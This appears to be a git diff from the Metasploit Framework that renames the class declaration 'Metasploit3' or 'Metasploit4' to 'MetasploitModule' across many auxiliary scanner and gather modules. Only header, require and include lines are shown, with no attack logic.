a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb index 80e049155d..ea0b86d9e3 100644 --- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb +++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb index 9e5643d353..b81cb81a35 100644 --- a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb +++ b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/hp_enum_perfd.rb b/modules/auxiliary/gather/hp_enum_perfd.rb index 1a51760858..f475e494fa 100644 --- a/modules/auxiliary/gather/hp_enum_perfd.rb +++ b/modules/auxiliary/gather/hp_enum_perfd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/hp_snac_domain_creds.rb b/modules/auxiliary/gather/hp_snac_domain_creds.rb index ad4b1c1cd2..85453c85de 100644 --- a/modules/auxiliary/gather/hp_snac_domain_creds.rb +++ b/modules/auxiliary/gather/hp_snac_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/huawei_wifi_info.rb b/modules/auxiliary/gather/huawei_wifi_info.rb index 83e648b066..a16713b7e2 100644 --- a/modules/auxiliary/gather/huawei_wifi_info.rb +++ b/modules/auxiliary/gather/huawei_wifi_info.rb @@ -6,7 +6,7 @@ require 'base64' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index 20b3d6911b..549afb8a64 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index 07cf026d44..fcbe65400b 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index d9ea98a4e6..71d6ba2162 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ie_uxss_injection.rb b/modules/auxiliary/gather/ie_uxss_injection.rb index f270a2eba2..2cb0acf9c3 100644 --- a/modules/auxiliary/gather/ie_uxss_injection.rb +++ b/modules/auxiliary/gather/ie_uxss_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/gather/impersonate_ssl.rb b/modules/auxiliary/gather/impersonate_ssl.rb index d6e084f9dd..a0440cf2fa 100644 --- a/modules/auxiliary/gather/impersonate_ssl.rb +++ b/modules/auxiliary/gather/impersonate_ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/java_rmi_registry.rb b/modules/auxiliary/gather/java_rmi_registry.rb index b16a028b08..0a579c1d6f 100644 --- a/modules/auxiliary/gather/java_rmi_registry.rb +++ b/modules/auxiliary/gather/java_rmi_registry.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Java::Rmi::Client diff --git a/modules/auxiliary/gather/jenkins_cred_recovery.rb b/modules/auxiliary/gather/jenkins_cred_recovery.rb index 3c7ed07bb3..fb4a08390d 100644 --- a/modules/auxiliary/gather/jenkins_cred_recovery.rb +++ b/modules/auxiliary/gather/jenkins_cred_recovery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb b/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb index 60e82d9b5a..00984aac86 100644 --- a/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb +++ b/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb index ae03c949d8..2e55add6f4 100644 --- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb +++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/joomla_weblinks_sqli.rb b/modules/auxiliary/gather/joomla_weblinks_sqli.rb index 06bb238dd1..b6562e9a94 100644 --- a/modules/auxiliary/gather/joomla_weblinks_sqli.rb +++ b/modules/auxiliary/gather/joomla_weblinks_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb index 27092ab4f4..34eb781aaa 100644 --- a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb +++ b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb index 484c796beb..6a02397f32 100644 --- a/modules/auxiliary/gather/lansweeper_collector.rb +++ b/modules/auxiliary/gather/lansweeper_collector.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/mantisbt_admin_sqli.rb b/modules/auxiliary/gather/mantisbt_admin_sqli.rb index 71f2c64cbd..689d06f303 100644 --- a/modules/auxiliary/gather/mantisbt_admin_sqli.rb +++ b/modules/auxiliary/gather/mantisbt_admin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/mcafee_epo_xxe.rb b/modules/auxiliary/gather/mcafee_epo_xxe.rb index 4d3803f39a..156d9c5647 100644 --- a/modules/auxiliary/gather/mcafee_epo_xxe.rb +++ b/modules/auxiliary/gather/mcafee_epo_xxe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/memcached_extractor.rb b/modules/auxiliary/gather/memcached_extractor.rb index 72df26dd36..90a2a82580 100644 --- a/modules/auxiliary/gather/memcached_extractor.rb +++ b/modules/auxiliary/gather/memcached_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb index 49278481d6..cfa322a485 100644 --- a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb +++ b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ms14_052_xmldom.rb b/modules/auxiliary/gather/ms14_052_xmldom.rb index 763be66084..527a1c54ef 100644 --- a/modules/auxiliary/gather/ms14_052_xmldom.rb +++ b/modules/auxiliary/gather/ms14_052_xmldom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index 394b1facdf..1aa5ebf20d 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/natpmp_external_address.rb b/modules/auxiliary/gather/natpmp_external_address.rb index fe78628201..84dd32c677 100644 --- a/modules/auxiliary/gather/natpmp_external_address.rb +++ b/modules/auxiliary/gather/natpmp_external_address.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/opennms_xxe.rb b/modules/auxiliary/gather/opennms_xxe.rb index 4f60c931a3..77ba454fa7 100644 --- a/modules/auxiliary/gather/opennms_xxe.rb +++ b/modules/auxiliary/gather/opennms_xxe.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'openssl' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index bd2c72c701..b55153c22f 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Exploit::Format::Webarchive diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb index 70e60de0ec..0867c62da5 100644 --- a/modules/auxiliary/gather/search_email_collector.rb +++ b/modules/auxiliary/gather/search_email_collector.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 0c192067d9..0d9a0e8925 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/https' require 'uri' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/solarwinds_orion_sqli.rb b/modules/auxiliary/gather/solarwinds_orion_sqli.rb index 50ea93d350..9565fda3c8 100644 --- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb +++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index 316dd0886a..eb16444b06 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -8,7 +8,7 @@ require 'active_support/inflector' require 'json' require 'active_support/core_ext/hash' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary class InvocationError < StandardError; end class RequestRateTooHigh < StandardError; end class InternalError < StandardError; end diff --git a/modules/auxiliary/gather/trackit_sql_domain_creds.rb b/modules/auxiliary/gather/trackit_sql_domain_creds.rb index 68b1c93e02..79c7d70947 100644 --- a/modules/auxiliary/gather/trackit_sql_domain_creds.rb +++ b/modules/auxiliary/gather/trackit_sql_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index d7de619453..35aab65f56 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index c88ab1fc3f..b7777b64c9 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/dcerpc' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index f3aed3ef04..c373f7da95 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index d302309b70..6531db1dc8 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 2dcc988ec3..b5de7b700e 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 20191221bd..a71c72732d 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb index 36920371f8..37bbb39e81 100644 --- a/modules/auxiliary/gather/xerox_pwd_extract.rb +++ b/modules/auxiliary/gather/xerox_pwd_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index acf8953766..0dc5277b72 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/parser/unattend.rb b/modules/auxiliary/parser/unattend.rb index 7ad4e310cd..b799364b31 100644 --- a/modules/auxiliary/parser/unattend.rb +++ b/modules/auxiliary/parser/unattend.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize(info={}) super( update_info( info, diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 438a3ecaee..bcf0040fa6 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/scanner/acpp/login.rb b/modules/auxiliary/scanner/acpp/login.rb index 10047d1b06..ea91ad047d 100644 --- a/modules/auxiliary/scanner/acpp/login.rb +++ b/modules/auxiliary/scanner/acpp/login.rb @@ -8,7 +8,7 @@ require 'rex/proto/acpp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/acpp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/afp/afp_login.rb b/modules/auxiliary/scanner/afp/afp_login.rb index 74aa22c26a..79ff59603a 100644 --- a/modules/auxiliary/scanner/afp/afp_login.rb +++ b/modules/auxiliary/scanner/afp/afp_login.rb @@ -8,7 +8,7 @@ require 'openssl' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/afp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/afp/afp_server_info.rb b/modules/auxiliary/scanner/afp/afp_server_info.rb index 5a7c4edc0c..b8de8c4b40 100644 --- a/modules/auxiliary/scanner/afp/afp_server_info.rb +++ b/modules/auxiliary/scanner/afp/afp_server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index d48bc8a561..c2925cb87d 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb index fe43a0e3e5..3dc4381ead 100644 --- a/modules/auxiliary/scanner/chargen/chargen_probe.rb +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index d7242a5e71..8a00c5aa99 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb index 5782874ac1..9cad284af0 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index b5afbe1bab..01a50ca23e 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/db2' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 3feac07d07..3344d38509 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 3b6aea526d..01dee58103 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index f99da3d29f..f451ba0dbc 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 79c2b359f7..379d331e20 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 753450426a..fc84d4d9b8 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 2641054b1f..38e1786a8a 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb index d8f2d437cb..2bbea57cc3 100644 --- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb +++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb @@ -8,7 +8,7 @@ require 'rex/proto/dcerpc' require 'rex/proto/dcerpc/wdscp' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index 12c88f72f6..b47d050977 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index cd1bf10cc4..532833e54d 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 50df7747c8..1f981c1dce 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/discovery/empty_udp.rb b/modules/auxiliary/scanner/discovery/empty_udp.rb index d64ec3ebd8..378d9e69f7 100644 --- a/modules/auxiliary/scanner/discovery/empty_udp.rb +++ b/modules/auxiliary/scanner/discovery/empty_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 4795a21ae8..52d730b0c1 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index c60d28db3a..48fadda6c6 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ 